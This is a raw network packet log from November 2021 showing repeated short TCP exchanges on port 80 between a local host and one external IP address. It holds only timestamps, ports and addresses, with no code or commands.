Nov 25, 2021 10:54:50.042721033 CET	50642	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:50.075962067 CET	80	50642	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:50.098364115 CET	80	50642	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:50.098412991 CET	80	50642	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:50.098607063 CET	50642	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:50.098656893 CET	50642	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:50.131819963 CET	80	50642	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:50.488801003 CET	50643	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:50.522227049 CET	80	50643	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:50.522480965 CET	50643	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:50.524008989 CET	50643	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:50.557410002 CET	80	50643	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:50.557706118 CET	50643	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:50.591108084 CET	80	50643	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:50.607568979 CET	80	50643	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:50.607620001 CET	80	50643	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:50.607780933 CET	50643	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:50.607836008 CET	50643	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:50.641418934 CET	80	50643	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:50.981517076 CET	50644	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.015412092 CET	80	50644	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.015544891 CET	50644	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.017242908 CET	50644	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.050939083 CET	80	50644	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.051208973 CET	50644	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.084866047 CET	80	50644	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.101434946 CET	80	50644	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.101443052 CET	80	50644	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.101629019 CET	50644	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.101643085 CET	50644	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.135407925 CET	80	50644	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.485807896 CET	50645	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.519224882 CET	80	50645	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.519387007 CET	50645	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.521089077 CET	50645	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.554433107 CET	80	50645	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.554606915 CET	50645	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.587842941 CET	80	50645	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.605211973 CET	80	50645	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.605268002 CET	80	50645	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.605475903 CET	50645	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.605528116 CET	50645	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.639193058 CET	80	50645	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.951457977 CET	50646	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.985578060 CET	80	50646	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:51.985790968 CET	50646	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:51.987313986 CET	50646	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:52.021435976 CET	80	50646	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:52.021644115 CET	50646	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:52.055854082 CET	80	50646	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:52.133135080 CET	80	50646	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:52.133193016 CET	80	50646	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:52.133491993 CET	50646	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:52.133553982 CET	50646	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:52.167695045 CET	80	50646	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:52.510248899 CET	50647	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:52.544245958 CET	80	50647	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:52.544481993 CET	50647	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:52.546072006 CET	50647	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:52.579941034 CET	80	50647	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:52.580209017 CET	50647	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:52.614064932 CET	80	50647	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:52.633761883 CET	80	50647	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:52.633812904 CET	80	50647	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:52.634171009 CET	50647	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:52.634228945 CET	50647	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:52.668323040 CET	80	50647	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:52.983680010 CET	50648	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:53.017776966 CET	80	50648	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:53.017998934 CET	50648	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:53.019557953 CET	50648	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:53.053574085 CET	80	50648	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:53.053774118 CET	50648	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:53.087970972 CET	80	50648	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:53.105624914 CET	80	50648	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:53.105689049 CET	80	50648	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:53.105839014 CET	50648	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:53.105901003 CET	50648	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:53.140250921 CET	80	50648	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:53.499207020 CET	50649	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:53.532633066 CET	80	50649	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:53.532828093 CET	50649	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:53.534334898 CET	50649	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:53.567639112 CET	80	50649	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:53.567799091 CET	50649	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:53.601298094 CET	80	50649	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:53.617039919 CET	80	50649	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:53.617104053 CET	80	50649	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:53.617306948 CET	50649	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:53.617372990 CET	50649	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:53.650919914 CET	80	50649	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:53.976608038 CET	50650	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:54.010060072 CET	80	50650	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:54.010234118 CET	50650	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:54.011786938 CET	50650	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:54.045109034 CET	80	50650	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:54.045353889 CET	50650	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:54.078701973 CET	80	50650	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:54.099575996 CET	80	50650	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:54.099632025 CET	80	50650	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:54.099776030 CET	50650	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:54.099829912 CET	50650	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:54.133445024 CET	80	50650	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:54.482963085 CET	50651	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:54.517136097 CET	80	50651	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:54.517386913 CET	50651	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:54.518848896 CET	50651	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:54.552876949 CET	80	50651	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:54.553011894 CET	50651	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:54.587321997 CET	80	50651	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:54.604268074 CET	80	50651	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:54.604326010 CET	80	50651	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:54.604510069 CET	50651	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:54.604564905 CET	50651	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:54.638566017 CET	80	50651	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:54.998291969 CET	50652	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:55.032357931 CET	80	50652	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:55.032589912 CET	50652	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:55.034068108 CET	50652	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:55.068085909 CET	80	50652	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:55.068362951 CET	50652	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:55.102463961 CET	80	50652	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:55.121545076 CET	80	50652	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:55.121598959 CET	80	50652	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:55.121822119 CET	50652	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:55.121876955 CET	50652	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:55.156069040 CET	80	50652	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:55.512557030 CET	50653	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:55.546209097 CET	80	50653	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:55.546422005 CET	50653	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:55.547945023 CET	50653	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:55.581243038 CET	80	50653	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:55.581582069 CET	50653	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:55.614912033 CET	80	50653	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:55.630640984 CET	80	50653	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:55.630686998 CET	80	50653	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:55.630872011 CET	50653	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:55.630919933 CET	50653	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:55.664478064 CET	80	50653	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:56.020250082 CET	50654	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:56.054369926 CET	80	50654	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:56.054553032 CET	50654	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:56.056137085 CET	50654	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:56.090115070 CET	80	50654	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:56.090389013 CET	50654	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:56.124516010 CET	80	50654	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:56.140597105 CET	80	50654	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:56.140676022 CET	80	50654	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:56.140837908 CET	50654	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:56.140902996 CET	50654	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:56.174793005 CET	80	50654	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:56.531260967 CET	50655	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:56.564644098 CET	80	50655	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:56.564960003 CET	50655	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:56.566469908 CET	50655	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:56.599761963 CET	80	50655	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:56.599968910 CET	50655	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:56.633264065 CET	80	50655	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:56.652795076 CET	80	50655	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:56.652842999 CET	80	50655	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:56.653011084 CET	50655	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:56.653059006 CET	50655	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:56.686561108 CET	80	50655	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.036341906 CET	50656	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:57.070497036 CET	80	50656	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.070867062 CET	50656	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:57.072319984 CET	50656	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:57.106537104 CET	80	50656	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.106746912 CET	50656	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:57.140958071 CET	80	50656	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.157145023 CET	80	50656	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.157200098 CET	80	50656	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.157365084 CET	50656	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:57.157418013 CET	50656	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:57.191993952 CET	80	50656	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.529908895 CET	50657	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:57.564084053 CET	80	50657	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.564352036 CET	50657	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:57.565910101 CET	50657	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:57.600157022 CET	80	50657	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.600450039 CET	50657	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:57.634639025 CET	80	50657	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.650789022 CET	80	50657	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.650851965 CET	80	50657	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.651005983 CET	50657	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:57.651076078 CET	50657	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:57.685391903 CET	80	50657	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:57.996268034 CET	50658	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.029544115 CET	80	50658	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.029710054 CET	50658	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.031225920 CET	50658	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.064444065 CET	80	50658	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.064599991 CET	50658	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.097728014 CET	80	50658	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.114200115 CET	80	50658	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.114223957 CET	80	50658	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.114356995 CET	50658	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.114403009 CET	50658	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.147524118 CET	80	50658	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.427764893 CET	50659	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.461535931 CET	80	50659	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.461977005 CET	50659	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.463608027 CET	50659	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.497528076 CET	80	50659	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.497852087 CET	50659	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.531963110 CET	80	50659	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.547542095 CET	80	50659	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.547600031 CET	80	50659	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.547799110 CET	50659	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.547859907 CET	50659	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.581872940 CET	80	50659	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.931375980 CET	50660	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.964812994 CET	80	50660	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:58.965044975 CET	50660	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.966615915 CET	50660	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:58.999986887 CET	80	50660	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:59.000210047 CET	50660	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:59.033494949 CET	80	50660	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:59.050348043 CET	80	50660	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:59.050395966 CET	80	50660	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:59.050590038 CET	50660	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:59.050638914 CET	50660	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:59.084141016 CET	80	50660	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:59.436274052 CET	50661	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:59.469892025 CET	80	50661	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:59.470107079 CET	50661	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:59.471626043 CET	50661	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:59.504967928 CET	80	50661	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:59.505177975 CET	50661	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:59.538597107 CET	80	50661	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:59.554025888 CET	80	50661	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:59.554078102 CET	80	50661	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:59.554363966 CET	50661	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:59.554486036 CET	50661	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:59.588073969 CET	80	50661	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:59.942713976 CET	50662	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:59.976748943 CET	80	50662	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:59.977050066 CET	50662	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:59.978508949 CET	50662	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.012794018 CET	80	50662	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.012969971 CET	50662	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.046955109 CET	80	50662	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.063477039 CET	80	50662	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.063533068 CET	80	50662	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.063699007 CET	50662	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.063751936 CET	50662	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.098089933 CET	80	50662	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.400588989 CET	50663	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.433942080 CET	80	50663	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.434190989 CET	50663	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.435672998 CET	50663	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.469090939 CET	80	50663	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.469307899 CET	50663	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.502618074 CET	80	50663	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.520142078 CET	80	50663	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.520190954 CET	80	50663	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.520363092 CET	50663	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.520411968 CET	50663	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.553837061 CET	80	50663	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.902201891 CET	50664	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.935652018 CET	80	50664	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.935966015 CET	50664	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.937403917 CET	50664	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:00.970750093 CET	80	50664	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:00.971019030 CET	50664	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.004358053 CET	80	50664	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:01.021702051 CET	80	50664	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:01.021764994 CET	80	50664	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:01.022120953 CET	50664	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.022152901 CET	50664	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.055552006 CET	80	50664	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:01.383090973 CET	50665	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.417042971 CET	80	50665	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:01.417280912 CET	50665	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.418915033 CET	50665	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.452784061 CET	80	50665	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:01.453049898 CET	50665	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.486962080 CET	80	50665	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:01.505518913 CET	80	50665	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:01.505599022 CET	80	50665	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:01.505779982 CET	50665	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.505840063 CET	50665	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.539906979 CET	80	50665	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:01.892349958 CET	50666	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.926343918 CET	80	50666	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:01.926673889 CET	50666	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.928400993 CET	50666	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.962302923 CET	80	50666	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:01.962481976 CET	50666	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:01.996659994 CET	80	50666	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:02.012738943 CET	80	50666	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:02.012795925 CET	80	50666	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:02.012972116 CET	50666	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:02.013056040 CET	50666	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:02.047327042 CET	80	50666	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:02.405865908 CET	50667	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:02.440001011 CET	80	50667	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:02.440257072 CET	50667	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:02.442047119 CET	50667	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:02.476066113 CET	80	50667	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:02.476366043 CET	50667	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:02.510585070 CET	80	50667	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:02.572565079 CET	80	50667	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:02.572618961 CET	80	50667	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:02.572796106 CET	50667	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:02.572849035 CET	50667	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:02.606930017 CET	80	50667	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:02.943223000 CET	50668	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:02.977240086 CET	80	50668	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:02.977444887 CET	50668	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:02.979042053 CET	50668	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:03.013103962 CET	80	50668	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:03.013314009 CET	50668	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:03.047431946 CET	80	50668	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:03.093652964 CET	80	50668	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:03.093729019 CET	80	50668	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:03.093846083 CET	50668	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:03.093905926 CET	50668	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:03.128145933 CET	80	50668	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:03.477989912 CET	50669	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:03.511496067 CET	80	50669	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:03.511683941 CET	50669	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:03.513245106 CET	50669	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:03.546597958 CET	80	50669	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:03.546888113 CET	50669	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:03.580240965 CET	80	50669	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:03.610613108 CET	80	50669	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:03.610691071 CET	80	50669	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:03.610840082 CET	50669	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:03.610920906 CET	50669	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:03.644182920 CET	80	50669	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:03.946517944 CET	50670	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:03.979687929 CET	80	50670	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:03.979898930 CET	50670	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:03.981456995 CET	50670	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:04.014601946 CET	80	50670	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:04.014763117 CET	50670	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:04.048021078 CET	80	50670	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:04.066714048 CET	80	50670	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:04.066766024 CET	80	50670	176.223.209.128	192.168.11.20
